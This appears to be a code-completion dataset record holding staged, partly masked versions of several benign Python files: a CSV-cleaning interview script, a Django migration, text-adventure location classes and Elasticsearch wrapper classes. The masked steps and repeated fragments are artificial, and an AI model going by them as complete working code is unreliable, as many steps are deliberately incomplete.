open(outputFileName, 'w+') as f:\n f.write(finalOutput)\nf.close()\nprint(errorFinalOutput)\nwith open(pickelFileName, 'wb') as f:\n pickle.dump(dataSources, f)\nf.close()\nwith open('pickle/masterDict', 'wb') as f:\n pickle.dump(pickleDict, f)\nf.close()\nprint(\n 'Thanks for taking the time to look at my code and consider me for this position. Cheers!'\n )\n",
"step-4": "import csv, os, sys, pickle\nfrom datetime import date\n\n\nclass DataSource:\n\n def __init__(self, name, usableRows, errorRows, indices):\n self.name = name\n self.usableRows = usableRows\n self.errorRows = errorRows\n self.indices = indices\n\n\ndef getHeaderIndexes(indices, headers):\n counter = -1\n a, b, c, d, e, f, g = False, False, False, False, False, False, False\n for header in headers:\n counter += 1\n if header.strip() == 'Provider Name':\n a = True\n indices['Provider Name'] = counter\n elif header.strip() == 'CampaignID':\n b = True\n indices['CampaignID'] = counter\n elif header.strip() == 'Cost Per Ad Click':\n c = True\n indices['Cost Per Ad Click'] = counter\n elif header.strip() == 'Redirect Link':\n d = True\n indices['Redirect Link'] = counter\n elif header.strip() == 'Phone Number':\n e = True\n indices['Phone Number'] = counter\n elif header.strip() == 'Address':\n f = True\n indices['Address'] = counter\n elif header.strip() == 'Zipcode':\n g = True\n indices['Zipcode'] = counter\n if (a == True and b == True and c == True and d == True and e == True and\n f == True and g == True):\n valid = True\n else:\n valid = False\n return indices, valid\n\n\ndef isRowValid(indices, row):\n sNNs = ['Provider Name', 'CampaignID', 'Redirect Link', 'Address',\n 'Zipcode']\n for column in sNNs:\n currentCheck = row[indices[column]].strip()\n if isinstance(currentCheck, str) and len(currentCheck\n ) > 0 and currentCheck != 'NULL':\n pass\n else:\n return False\n fNNs = ['Cost Per Ad Click']\n for column in fNNs:\n currentCheck = row[indices[column]].strip('\"')\n currentCheck = currentCheck.strip(\"'\")\n try:\n float(currentCheck)\n except:\n return False\n sNs = ['Phone Number']\n return True\n\n\ndef addUsableRow(indices, row, finalOutput):\n pn = row[indices['Provider Name']].strip('\"')\n cid = row[indices['CampaignID']].strip('\"')\n cpac = row[indices['Cost Per Ad Click']].strip('\"')\n rl = row[indices['Redirect Link']].strip('\"')\n if row[indices['Phone Number']] == '':\n phn = 'NULL'\n else:\n phn = row[indices['Phone Number']].strip('\"')\n ad = row[indices['Address']].strip('\"')\n zc = row[indices['Zipcode']].strip('\"')\n temp = ('\"' + pn + '\",\"' + cid + '\",\"' + cpac + '\",\"' + rl + '\",\"' +\n phn + '\",\"' + ad + '\",\"' + zc + '\"' + '\\n')\n finalOutput += temp\n return finalOutput\n\n\ndef addErrorRow(indices, row, errorFinalOutput):\n temp = 'Error: ' + '\\n'\n for thing in row:\n temp += thing + ','\n temp = temp[:-1]\n temp += '\\n'\n errorFinalOutput += temp\n return errorFinalOutput\n\n\nfinalOutput = (\n 'Provider Name, CampaignID, Cost Per Ad Click, RedirectLink, Phone Number, Address, Zipcode'\n + '\\n')\nerrorFinalOutput = ''\noutputFileName = 'outputFiles/ZebraAssignmentOutput-' + str(date.today()\n ) + '.csv'\npickelFileName = 'pickle/' + str(date.today())\npickleDict = {}\nmaxLines = 99999\ndataSources = []\nindices = {'Provider Name': 0, 'CampaignID': 0, 'Cost Per Ad Click': 0,\n 'Redirect Link': 0, 'Phone Number': 0, 'Address': 0, 'Zipcode': 0}\ninputDirectory = 'inputFiles'\ncurrentLines = 0\nfor file in os.listdir(inputDirectory):\n currentLines += sum(1 for line in open(inputDirectory + '/' + file))\n if currentLines > maxLines:\n sys.exit('Error: Too many lines')\n if file[-3:] != 'csv':\n sys.exit('Error: Given file not a .csv file')\nfor file in os.listdir(inputDirectory):\n usableRows = 0\n errorRows = 0\n with open(inputDirectory + '/' + file, newline='') as f:\n reader = csv.reader(f)\n try:\n headers = next(reader)\n except:\n headers = ''\n indicesCurrent, valid = getHeaderIndexes(indices, headers)\n if valid == True:\n for row in reader:\n if isRowValid(indicesCurrent, row):\n finalOutput = addUsableRow(indicesCurrent, row, finalOutput\n )\n usableRows += 1\n else:\n errorFinalOutput = addErrorRow(indicesCurrent, row,\n errorFinalOutput)\n errorRows += 1\n pickleDict[file] = indicesCurrent\n else:\n for row in reader:\n errorFinalOutput = addErrorRow(indicesCurrent, row,\n errorFinalOutput)\n errorRows += 1\n f.close()\n newDataSource = DataSource(file, usableRows, errorRows, indices)\n dataSources.append(newDataSource)\nwith open(outputFileName, 'w+') as f:\n f.write(finalOutput)\nf.close()\nprint(errorFinalOutput)\nwith open(pickelFileName, 'wb') as f:\n pickle.dump(dataSources, f)\nf.close()\nwith open('pickle/masterDict', 'wb') as f:\n pickle.dump(pickleDict, f)\nf.close()\nprint(\n 'Thanks for taking the time to look at my code and consider me for this position. Cheers!'\n )\n",
"step-5": "#Created by Jake Hansen for Zebra interview take home assessment, July 2020.\nimport csv, os, sys, pickle\nfrom datetime import date\n\n#Class For storing information about each file generally. Helpful for future\n#use cases to remember the indicies from a file, if file has thousands of fields\n#Also can be used as a log to store daily number of 'good' vs 'bad' rows\nclass DataSource:\n def __init__(self, name, usableRows, errorRows, indices):\n self.name = name\n self.usableRows = usableRows\n self.errorRows = errorRows\n self.indices = indices\n\n# getHeaderIndexes(indices, headers)\n# Requires: Pre-populated indices dictionary, the header's row from a CSV file with\n# naming convention conforming to the schema output from the directions\n# Effects: Determines if file has the necessary colums to match the desired output\n# schema\n# Modifies: The indices variable, returning the correct indices within the csv row\ndef getHeaderIndexes(indices, headers):\n counter = -1\n a,b,c,d,e,f,g = False, False, False, False,False,False,False\n for header in headers:\n counter += 1\n if header.strip() == 'Provider Name':\n a = True\n indices['Provider Name'] = counter\n elif header.strip() == 'CampaignID':\n b = True\n indices['CampaignID'] = counter\n elif header.strip() == 'Cost Per Ad Click':\n c = True\n indices['Cost Per Ad Click'] = counter\n elif header.strip() == 'Redirect Link':\n d = True\n indices['Redirect Link'] = counter\n elif header.strip() == 'Phone Number':\n e = True\n indices['Phone Number'] = counter\n elif header.strip() == 'Address':\n f = True\n indices['Address'] = counter\n elif header.strip() == 'Zipcode':\n g = True\n indices['Zipcode'] = counter\n if a == True and b == True and c == True and d == True and e == True and f == True and g == True:\n valid = True\n else:\n valid = False\n return indices, valid\n\n# isRowValid(indices,row)\n# Requires: a valid CSV file with columns necessary to match the expected output\n# Effects: Determines if a single row should be added to the final output, or if\n# the row is missing data / has incorrect data types for the field and thus\n# will not be added to the output but instead printed out\n# Modifies: N/A\ndef isRowValid(indices, row):\n #String Non-Nullables\n sNNs = ['Provider Name', 'CampaignID', 'Redirect Link', 'Address', 'Zipcode']\n for column in sNNs:\n currentCheck = row[indices[column]].strip()\n if isinstance(currentCheck, str) and len(currentCheck) > 0 and currentCheck != 'NULL':\n pass\n else:\n return False\n\n #Float Non Nullables\n fNNs = ['Cost Per Ad Click']\n for column in fNNs:\n currentCheck = row[indices[column]].strip('\"')\n currentCheck = currentCheck.strip(\"'\")\n try:\n float(currentCheck)\n except:\n return False\n\n #String Nullables\n sNs = ['Phone Number']\n #No Check Required, because it can be nullable or a string. I do assume that\n #it is required to have a \"Phone Number\" column, which is checked for in getHeaderIndexes\n\n return True\n\n# addUsableRow(indices, row, finalOutput)\n# Requires: The row is known to follow the output schema as specificed in the requirements\n# Effects: Adds row variables in the order specified in the output schema\n# Modifies: the final output variable\ndef addUsableRow(indices, row, finalOutput):\n pn = row[indices['Provider Name']].strip('\"')\n cid = row[indices['CampaignID']].strip('\"')\n cpac = row[indices['Cost Per Ad Click']].strip('\"')\n rl = row[indices['Redirect Link']].strip('\"')\n if row[indices['Phone Number']] == '':\n phn = 'NULL'\n else:\n phn = row[indices['Phone Number']].strip('\"')\n ad = row[indices['Address']].strip('\"')\n zc = row[indices['Zipcode']].strip('\"')\n\n temp = '\"'+ pn + '\",\"' + cid + '\",\"' + cpac + '\",\"' + rl + '\",\"' + phn + '\",\"' + ad + '\",\"' + zc + '\"' + '\\n'\n finalOutput += temp\n return finalOutput\n\n# addErrorRow(indices, row, errorFinalOutput)\n# Requires: The row does not follow the output schema\n# Effects: adds the row to the error output variable that will be printed out\n# Modifies: the error final output string which gets printed at the end of the daily\n# job / procedure / script/ whatever The Zebra prefers to call these python data projects\ndef addErrorRow(indices, row, errorFinalOutput):\n temp = 'Error: ' + '\\n'\n for thing in row:\n temp += thing + ','\n temp = temp[:-1]\n temp += '\\n'\n errorFinalOutput += temp\n return errorFinalOutput\n\n#Variables and data structures\nfinalOutput = 'Provider Name, CampaignID, Cost Per Ad Click, RedirectLink, Phone Number, Address, Zipcode' + '\\n'\nerrorFinalOutput = ''\n# outputFileName = 'outputFilesTest/ZebraAssignmentOutput-' + str(date.today()) + '.csv'\noutputFileName = 'outputFiles/ZebraAssignmentOutput-' + str(date.today()) + '.csv'\npickelFileName = 'pickle/' + str(date.today())\n# pickelFileName = 'pickleTest/' + str(date.today())\npickleDict = {}\nmaxLines = 99999\ndataSources = []\nindices = {\n \"Provider Name\": 0,\n \"CampaignID\": 0,\n \"Cost Per Ad Click\": 0,\n \"Redirect Link\": 0,\n \"Phone Number\": 0,\n \"Address\": 0,\n \"Zipcode\": 0\n}\n\n#InputFiles in list form\n# inputList = [\n# 'inputFilesTest/Auto.csv',\n# 'inputFilesTest/Home.csv'\n# ]\n\n# InputFiles in a directory\ninputDirectory = 'inputFiles'\n\n#check if files are too large, or non-csv files\ncurrentLines = 0\nfor file in os.listdir(inputDirectory):\n# for file in inputList:\n # currentLines += sum(1 for line in open(file))\n currentLines += sum(1 for line in open(inputDirectory + '/' + file))\n if currentLines > maxLines:\n sys.exit('Error: Too many lines')\n if file[-3:] != 'csv':\n sys.exit('Error: Given file not a .csv file')\n\n#Main Algorithm loop through all files in the list\nfor file in os.listdir(inputDirectory):\n# for file in inputList:\n #usableRows and errorRows used for storing information from each data source\n usableRows = 0\n errorRows = 0\n # with open(file, newline='') as f:\n with open(inputDirectory + '/' + file, newline='') as f:\n reader = csv.reader(f)\n try:\n headers = next(reader)\n except:\n headers = ''\n indicesCurrent, valid = getHeaderIndexes(indices, headers)\n if valid == True:\n for row in reader:\n if isRowValid(indicesCurrent, row):\n finalOutput = addUsableRow(indicesCurrent,row, finalOutput)\n usableRows += 1\n else:\n errorFinalOutput = addErrorRow(indicesCurrent, row, errorFinalOutput)\n errorRows += 1\n pickleDict[file] = indicesCurrent\n\n else:\n for row in reader:\n errorFinalOutput = addErrorRow(indicesCurrent, row, errorFinalOutput)\n errorRows += 1\n\n f.close()\n #Add dataSource Information for possible future needs and logging purposes\n newDataSource = DataSource(file,usableRows, errorRows, indices)\n dataSources.append(newDataSource)\n\n#Create file with rows containing correct schema\nwith open(outputFileName, 'w+') as f:\n f.write(finalOutput)\nf.close()\n\n#print the incorrect rows\nprint(errorFinalOutput)\n\n#Create Pickel file containing data source info for daily logging\nwith open(pickelFileName, 'wb') as f:\n pickle.dump(dataSources, f)\nf.close()\n\n#Create Pickle File dictionary with indices specific info for filenames\nwith open('pickle/masterDict', 'wb') as f:\n pickle.dump(pickleDict, f)\nf.close()\n\n#Thank you line\nprint(\"Thanks for taking the time to look at my code and consider me for this position. Cheers!\")\n",
"step-ids": [
5,
6,
8,
9,
10
]
}
|
[
5,
6,
8,
9,
10
] |
# Generated by Django 2.1.2 on 2018-10-19 22:13
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='mascota',
name='descripcion',
field=models.CharField(max_length=200),
),
]
|
normal
|
{
"blob_id": "fcfec60a2302ee0c1385add053d4371040a2aff4",
"index": 3667,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('core', '0001_initial')]\n operations = [migrations.AlterField(model_name='mascota', name=\n 'descripcion', field=models.CharField(max_length=200))]\n",
"step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('core', '0001_initial')]\n operations = [migrations.AlterField(model_name='mascota', name=\n 'descripcion', field=models.CharField(max_length=200))]\n",
"step-5": "# Generated by Django 2.1.2 on 2018-10-19 22:13\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('core', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='mascota',\n name='descripcion',\n field=models.CharField(max_length=200),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import items
import grupo
class Conexion:
def __init__(self, direccion, destino):
self.set_direccion(direccion)
self.set_destino(destino)
def __repr__(self):
return str(self.direccion()) + ' => ' + str(self.destino())
def direccion(self):
return self._direccion
def set_direccion(self, direccion):
self._direccion = direccion
def destino(self):
return self._destino
def set_destino(self, destino):
self._destino = destino
class GrupoConexiones(grupo.Grupo):
def conexiones(self):
return self.coleccion()
def conecta_al(self, direccion):
for conexion in self.conexiones():
if conexion.direccion() == direccion:
return conexion.destino()
return localidad_nula
class Localidad:
def __init__(self, nombre, descripcion, conexiones=None, contiene=None):
self.set_nombre(nombre)
self.set_descripcion(descripcion)
self._conexiones = GrupoConexiones(conexiones)
self._grupo_items = items.GrupoItems(contiene)
def __repr__(self):
return self.nombre()
def nombre(self):
return self._nombre
def set_nombre(self, nombre):
self._nombre = nombre
def descripcion(self):
return self._descripcion
def set_descripcion(self, descripcion):
self._descripcion = descripcion
def conexiones(self):
return self._conexiones
def items(self):
return self._grupo_items
def describir(self):
print(self.nombre())
print(self.descripcion())
if not self.items().esta_vacio():
print('También puedes ver:')
for item in self.items():
print('-', item.nombre())
def conecta_con(self, iterable):
self.conexiones().meter_masivo(iterable)
def conecta_al(self, direccion):
return self.conexiones().conecta_al(direccion)
def meter_conexion(self, conexion):
self.conexiones().meter(conexion)
def contiene_token(self, token):
return self.items().contiene_token(token)
# def meter_item(self, item):
# self._grupo_items.meter(item)
# def sacar_item(self, item):
# self._grupo_items.sacar(item)
# def contiene_item(self, item):
# return self._grupo_items.contiene(item)
# def tiene_items(self):
# return self._grupo_items.esta_vacio()
localidad_nula = Localidad('NULA', 'Localidad nula.')
|
normal
|
{
"blob_id": "f59e61977f7c72ab191aadccbd72d23f831b3a1c",
"index": 7050,
"step-1": "<mask token>\n\n\nclass Conexion:\n\n def __init__(self, direccion, destino):\n self.set_direccion(direccion)\n self.set_destino(destino)\n <mask token>\n <mask token>\n\n def set_direccion(self, direccion):\n self._direccion = direccion\n <mask token>\n <mask token>\n\n\nclass GrupoConexiones(grupo.Grupo):\n\n def conexiones(self):\n return self.coleccion()\n\n def conecta_al(self, direccion):\n for conexion in self.conexiones():\n if conexion.direccion() == direccion:\n return conexion.destino()\n return localidad_nula\n\n\nclass Localidad:\n\n def __init__(self, nombre, descripcion, conexiones=None, contiene=None):\n self.set_nombre(nombre)\n self.set_descripcion(descripcion)\n self._conexiones = GrupoConexiones(conexiones)\n self._grupo_items = items.GrupoItems(contiene)\n\n def __repr__(self):\n return self.nombre()\n\n def nombre(self):\n return self._nombre\n\n def set_nombre(self, nombre):\n self._nombre = nombre\n\n def descripcion(self):\n return self._descripcion\n\n def set_descripcion(self, descripcion):\n self._descripcion = descripcion\n\n def conexiones(self):\n return self._conexiones\n\n def items(self):\n return self._grupo_items\n\n def describir(self):\n print(self.nombre())\n print(self.descripcion())\n if not self.items().esta_vacio():\n print('También puedes ver:')\n for item in self.items():\n print('-', item.nombre())\n\n def conecta_con(self, iterable):\n self.conexiones().meter_masivo(iterable)\n\n def conecta_al(self, direccion):\n return self.conexiones().conecta_al(direccion)\n\n def meter_conexion(self, conexion):\n self.conexiones().meter(conexion)\n\n def contiene_token(self, token):\n return self.items().contiene_token(token)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Conexion:\n\n def __init__(self, direccion, destino):\n self.set_direccion(direccion)\n self.set_destino(destino)\n <mask token>\n\n def direccion(self):\n return self._direccion\n\n def set_direccion(self, direccion):\n self._direccion = direccion\n <mask token>\n\n def set_destino(self, destino):\n self._destino = destino\n\n\nclass GrupoConexiones(grupo.Grupo):\n\n def conexiones(self):\n return self.coleccion()\n\n def conecta_al(self, direccion):\n for conexion in self.conexiones():\n if conexion.direccion() == direccion:\n return conexion.destino()\n return localidad_nula\n\n\nclass Localidad:\n\n def __init__(self, nombre, descripcion, conexiones=None, contiene=None):\n self.set_nombre(nombre)\n self.set_descripcion(descripcion)\n self._conexiones = GrupoConexiones(conexiones)\n self._grupo_items = items.GrupoItems(contiene)\n\n def __repr__(self):\n return self.nombre()\n\n def nombre(self):\n return self._nombre\n\n def set_nombre(self, nombre):\n self._nombre = nombre\n\n def descripcion(self):\n return self._descripcion\n\n def set_descripcion(self, descripcion):\n self._descripcion = descripcion\n\n def conexiones(self):\n return self._conexiones\n\n def items(self):\n return self._grupo_items\n\n def describir(self):\n print(self.nombre())\n print(self.descripcion())\n if not self.items().esta_vacio():\n print('También puedes ver:')\n for item in self.items():\n print('-', item.nombre())\n\n def conecta_con(self, iterable):\n self.conexiones().meter_masivo(iterable)\n\n def conecta_al(self, direccion):\n return self.conexiones().conecta_al(direccion)\n\n def meter_conexion(self, conexion):\n self.conexiones().meter(conexion)\n\n def contiene_token(self, token):\n return self.items().contiene_token(token)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Conexion:\n\n def __init__(self, direccion, destino):\n self.set_direccion(direccion)\n self.set_destino(destino)\n\n def __repr__(self):\n return str(self.direccion()) + ' => ' + str(self.destino())\n\n def direccion(self):\n return self._direccion\n\n def set_direccion(self, direccion):\n self._direccion = direccion\n\n def destino(self):\n return self._destino\n\n def set_destino(self, destino):\n self._destino = destino\n\n\nclass GrupoConexiones(grupo.Grupo):\n\n def conexiones(self):\n return self.coleccion()\n\n def conecta_al(self, direccion):\n for conexion in self.conexiones():\n if conexion.direccion() == direccion:\n return conexion.destino()\n return localidad_nula\n\n\nclass Localidad:\n\n def __init__(self, nombre, descripcion, conexiones=None, contiene=None):\n self.set_nombre(nombre)\n self.set_descripcion(descripcion)\n self._conexiones = GrupoConexiones(conexiones)\n self._grupo_items = items.GrupoItems(contiene)\n\n def __repr__(self):\n return self.nombre()\n\n def nombre(self):\n return self._nombre\n\n def set_nombre(self, nombre):\n self._nombre = nombre\n\n def descripcion(self):\n return self._descripcion\n\n def set_descripcion(self, descripcion):\n self._descripcion = descripcion\n\n def conexiones(self):\n return self._conexiones\n\n def items(self):\n return self._grupo_items\n\n def describir(self):\n print(self.nombre())\n print(self.descripcion())\n if not self.items().esta_vacio():\n print('También puedes ver:')\n for item in self.items():\n print('-', item.nombre())\n\n def conecta_con(self, iterable):\n self.conexiones().meter_masivo(iterable)\n\n def conecta_al(self, direccion):\n return self.conexiones().conecta_al(direccion)\n\n def meter_conexion(self, conexion):\n self.conexiones().meter(conexion)\n\n def contiene_token(self, token):\n return self.items().contiene_token(token)\n\n\nlocalidad_nula = Localidad('NULA', 'Localidad nula.')\n",
"step-4": "import items\nimport grupo\n\n\nclass Conexion:\n\n def __init__(self, direccion, destino):\n self.set_direccion(direccion)\n self.set_destino(destino)\n\n def __repr__(self):\n return str(self.direccion()) + ' => ' + str(self.destino())\n\n def direccion(self):\n return self._direccion\n\n def set_direccion(self, direccion):\n self._direccion = direccion\n\n def destino(self):\n return self._destino\n\n def set_destino(self, destino):\n self._destino = destino\n\n\nclass GrupoConexiones(grupo.Grupo):\n\n def conexiones(self):\n return self.coleccion()\n\n def conecta_al(self, direccion):\n for conexion in self.conexiones():\n if conexion.direccion() == direccion:\n return conexion.destino()\n return localidad_nula\n\n\nclass Localidad:\n\n def __init__(self, nombre, descripcion, conexiones=None, contiene=None):\n self.set_nombre(nombre)\n self.set_descripcion(descripcion)\n self._conexiones = GrupoConexiones(conexiones)\n self._grupo_items = items.GrupoItems(contiene)\n\n def __repr__(self):\n return self.nombre()\n\n def nombre(self):\n return self._nombre\n\n def set_nombre(self, nombre):\n self._nombre = nombre\n\n def descripcion(self):\n return self._descripcion\n\n def set_descripcion(self, descripcion):\n self._descripcion = descripcion\n\n def conexiones(self):\n return self._conexiones\n\n def items(self):\n return self._grupo_items\n\n def describir(self):\n print(self.nombre())\n print(self.descripcion())\n if not self.items().esta_vacio():\n print('También puedes ver:')\n for item in self.items():\n print('-', item.nombre())\n\n def conecta_con(self, iterable):\n self.conexiones().meter_masivo(iterable)\n\n def conecta_al(self, direccion):\n return self.conexiones().conecta_al(direccion)\n\n def meter_conexion(self, conexion):\n self.conexiones().meter(conexion)\n\n def contiene_token(self, token):\n return self.items().contiene_token(token)\n\n\nlocalidad_nula = Localidad('NULA', 'Localidad nula.')\n",
"step-5": "import items\nimport grupo\n\nclass Conexion:\n def __init__(self, direccion, destino):\n self.set_direccion(direccion)\n self.set_destino(destino)\n\n def __repr__(self):\n return str(self.direccion()) + ' => ' + str(self.destino())\n\n def direccion(self):\n return self._direccion\n\n def set_direccion(self, direccion):\n self._direccion = direccion\n\n def destino(self):\n return self._destino\n\n def set_destino(self, destino):\n self._destino = destino\n\nclass GrupoConexiones(grupo.Grupo):\n def conexiones(self):\n return self.coleccion()\n\n def conecta_al(self, direccion):\n for conexion in self.conexiones():\n if conexion.direccion() == direccion:\n return conexion.destino()\n return localidad_nula\n\nclass Localidad:\n def __init__(self, nombre, descripcion, conexiones=None, contiene=None):\n self.set_nombre(nombre)\n self.set_descripcion(descripcion)\n self._conexiones = GrupoConexiones(conexiones)\n self._grupo_items = items.GrupoItems(contiene)\n\n def __repr__(self):\n return self.nombre()\n\n def nombre(self):\n return self._nombre\n\n def set_nombre(self, nombre):\n self._nombre = nombre\n\n def descripcion(self):\n return self._descripcion\n\n def set_descripcion(self, descripcion):\n self._descripcion = descripcion\n\n def conexiones(self):\n return self._conexiones\n\n def items(self):\n return self._grupo_items\n\n def describir(self):\n print(self.nombre())\n print(self.descripcion())\n if not self.items().esta_vacio():\n print('También puedes ver:')\n for item in self.items():\n print('-', item.nombre())\n\n def conecta_con(self, iterable):\n self.conexiones().meter_masivo(iterable)\n\n def conecta_al(self, direccion):\n return self.conexiones().conecta_al(direccion)\n\n def meter_conexion(self, conexion):\n self.conexiones().meter(conexion)\n\n def contiene_token(self, token):\n return self.items().contiene_token(token)\n\n # def meter_item(self, item):\n # self._grupo_items.meter(item)\n\n # def sacar_item(self, item):\n # self._grupo_items.sacar(item)\n\n # def contiene_item(self, item):\n # return self._grupo_items.contiene(item)\n\n # def tiene_items(self):\n # return self._grupo_items.esta_vacio()\n\nlocalidad_nula = Localidad('NULA', 'Localidad nula.')\n",
"step-ids": [
20,
22,
25,
26,
27
]
}
|
[
20,
22,
25,
26,
27
] |
<|reserved_special_token_0|>
class KibbleESWrapper(object):
<|reserved_special_token_0|>
def __init__(self, ES):
self.ES = ES
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def scroll(self, scroll_id, scroll):
return self.ES.scroll(scroll_id=scroll_id, scroll=scroll)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class KibbleESWrapperSeven(object):
"""
Class for rewriting old-style queries to the >= 7.x ones,
where doc_type is an integral part of the DB name and NO DOC_TYPE!
"""
def __init__(self, ES):
self.ES = ES
def get(self, index, doc_type, id):
return self.ES.get(index=index + '_' + doc_type, id=id)
def exists(self, index, doc_type, id):
return self.ES.exists(index=index + '_' + doc_type, id=id)
def delete(self, index, doc_type, id):
return self.ES.delete(index=index + '_' + doc_type, id=id)
def index(self, index, doc_type, id, body):
return self.ES.index(index=index + '_' + doc_type, id=id, body=body)
def update(self, index, doc_type, id, body):
return self.ES.update(index=index + '_' + doc_type, id=id, body=body)
def scroll(self, scroll_id, scroll):
return self.ES.scroll(scroll_id=scroll_id, scroll=scroll)
def delete_by_query(self, **kwargs):
return self.ES.delete_by_query(**kwargs)
def search(self, index, doc_type, size=100, scroll=None,
_source_include=None, body=None):
return self.ES.search(index=index + '_' + doc_type, size=size,
scroll=scroll, _source_includes=_source_include, body=body)
def count(self, index, doc_type='*', body=None):
return self.ES.count(index=index + '_' + doc_type, body=body)
class KibbleDatabase(object):
def __init__(self, config: KibbleConfigParser):
self.config = config
self.dbname = config.get('elasticsearch', 'dbname')
self.ES = elasticsearch.Elasticsearch([config.get('elasticsearch',
'conn_uri')], use_ssl=config.getboolean('elasticsearch', 'ssl'),
verify_certs=False, max_retries=5, retry_on_timeout=True)
self.ESversion = int(self.ES.info()['version']['number'].split('.')[0])
if self.ESversion >= 7:
self.ES = KibbleESWrapperSeven(self.ES)
elif self.ESversion >= 6:
self.ES = KibbleESWrapper(self.ES)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class KibbleESWrapper(object):
<|reserved_special_token_0|>
def __init__(self, ES):
self.ES = ES
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def index(self, index, doc_type, id, body):
return self.ES.index(index=index + '_' + doc_type, doc_type='_doc',
id=id, body=body)
<|reserved_special_token_0|>
def scroll(self, scroll_id, scroll):
return self.ES.scroll(scroll_id=scroll_id, scroll=scroll)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def count(self, index, doc_type='*', body=None):
return self.ES.count(index=index + '_' + doc_type, doc_type='_doc',
body=body)
class KibbleESWrapperSeven(object):
"""
Class for rewriting old-style queries to the >= 7.x ones,
where doc_type is an integral part of the DB name and NO DOC_TYPE!
"""
def __init__(self, ES):
self.ES = ES
def get(self, index, doc_type, id):
return self.ES.get(index=index + '_' + doc_type, id=id)
def exists(self, index, doc_type, id):
return self.ES.exists(index=index + '_' + doc_type, id=id)
def delete(self, index, doc_type, id):
return self.ES.delete(index=index + '_' + doc_type, id=id)
def index(self, index, doc_type, id, body):
return self.ES.index(index=index + '_' + doc_type, id=id, body=body)
def update(self, index, doc_type, id, body):
return self.ES.update(index=index + '_' + doc_type, id=id, body=body)
def scroll(self, scroll_id, scroll):
return self.ES.scroll(scroll_id=scroll_id, scroll=scroll)
def delete_by_query(self, **kwargs):
return self.ES.delete_by_query(**kwargs)
def search(self, index, doc_type, size=100, scroll=None,
_source_include=None, body=None):
return self.ES.search(index=index + '_' + doc_type, size=size,
scroll=scroll, _source_includes=_source_include, body=body)
def count(self, index, doc_type='*', body=None):
return self.ES.count(index=index + '_' + doc_type, body=body)
class KibbleDatabase(object):
def __init__(self, config: KibbleConfigParser):
self.config = config
self.dbname = config.get('elasticsearch', 'dbname')
self.ES = elasticsearch.Elasticsearch([config.get('elasticsearch',
'conn_uri')], use_ssl=config.getboolean('elasticsearch', 'ssl'),
verify_certs=False, max_retries=5, retry_on_timeout=True)
self.ESversion = int(self.ES.info()['version']['number'].split('.')[0])
if self.ESversion >= 7:
self.ES = KibbleESWrapperSeven(self.ES)
elif self.ESversion >= 6:
self.ES = KibbleESWrapper(self.ES)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class KibbleESWrapper(object):
<|reserved_special_token_0|>
def __init__(self, ES):
self.ES = ES
def get(self, index, doc_type, id):
return self.ES.get(index=index + '_' + doc_type, doc_type='_doc', id=id
)
def exists(self, index, doc_type, id):
return self.ES.exists(index=index + '_' + doc_type, doc_type='_doc',
id=id)
<|reserved_special_token_0|>
def index(self, index, doc_type, id, body):
return self.ES.index(index=index + '_' + doc_type, doc_type='_doc',
id=id, body=body)
def update(self, index, doc_type, id, body):
return self.ES.update(index=index + '_' + doc_type, doc_type='_doc',
id=id, body=body)
def scroll(self, scroll_id, scroll):
return self.ES.scroll(scroll_id=scroll_id, scroll=scroll)
<|reserved_special_token_0|>
def search(self, index, doc_type, size=100, scroll=None,
_source_include=None, body=None):
return self.ES.search(index=index + '_' + doc_type, doc_type='_doc',
size=size, scroll=scroll, _source_include=_source_include, body
=body)
def count(self, index, doc_type='*', body=None):
return self.ES.count(index=index + '_' + doc_type, doc_type='_doc',
body=body)
class KibbleESWrapperSeven(object):
"""
Class for rewriting old-style queries to the >= 7.x ones,
where doc_type is an integral part of the DB name and NO DOC_TYPE!
"""
def __init__(self, ES):
self.ES = ES
def get(self, index, doc_type, id):
return self.ES.get(index=index + '_' + doc_type, id=id)
def exists(self, index, doc_type, id):
return self.ES.exists(index=index + '_' + doc_type, id=id)
def delete(self, index, doc_type, id):
return self.ES.delete(index=index + '_' + doc_type, id=id)
def index(self, index, doc_type, id, body):
return self.ES.index(index=index + '_' + doc_type, id=id, body=body)
def update(self, index, doc_type, id, body):
return self.ES.update(index=index + '_' + doc_type, id=id, body=body)
def scroll(self, scroll_id, scroll):
return self.ES.scroll(scroll_id=scroll_id, scroll=scroll)
def delete_by_query(self, **kwargs):
return self.ES.delete_by_query(**kwargs)
def search(self, index, doc_type, size=100, scroll=None,
_source_include=None, body=None):
return self.ES.search(index=index + '_' + doc_type, size=size,
scroll=scroll, _source_includes=_source_include, body=body)
def count(self, index, doc_type='*', body=None):
return self.ES.count(index=index + '_' + doc_type, body=body)
class KibbleDatabase(object):
def __init__(self, config: KibbleConfigParser):
self.config = config
self.dbname = config.get('elasticsearch', 'dbname')
self.ES = elasticsearch.Elasticsearch([config.get('elasticsearch',
'conn_uri')], use_ssl=config.getboolean('elasticsearch', 'ssl'),
verify_certs=False, max_retries=5, retry_on_timeout=True)
self.ESversion = int(self.ES.info()['version']['number'].split('.')[0])
if self.ESversion >= 7:
self.ES = KibbleESWrapperSeven(self.ES)
elif self.ESversion >= 6:
self.ES = KibbleESWrapper(self.ES)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class KibbleESWrapper(object):
<|reserved_special_token_0|>
def __init__(self, ES):
self.ES = ES
def get(self, index, doc_type, id):
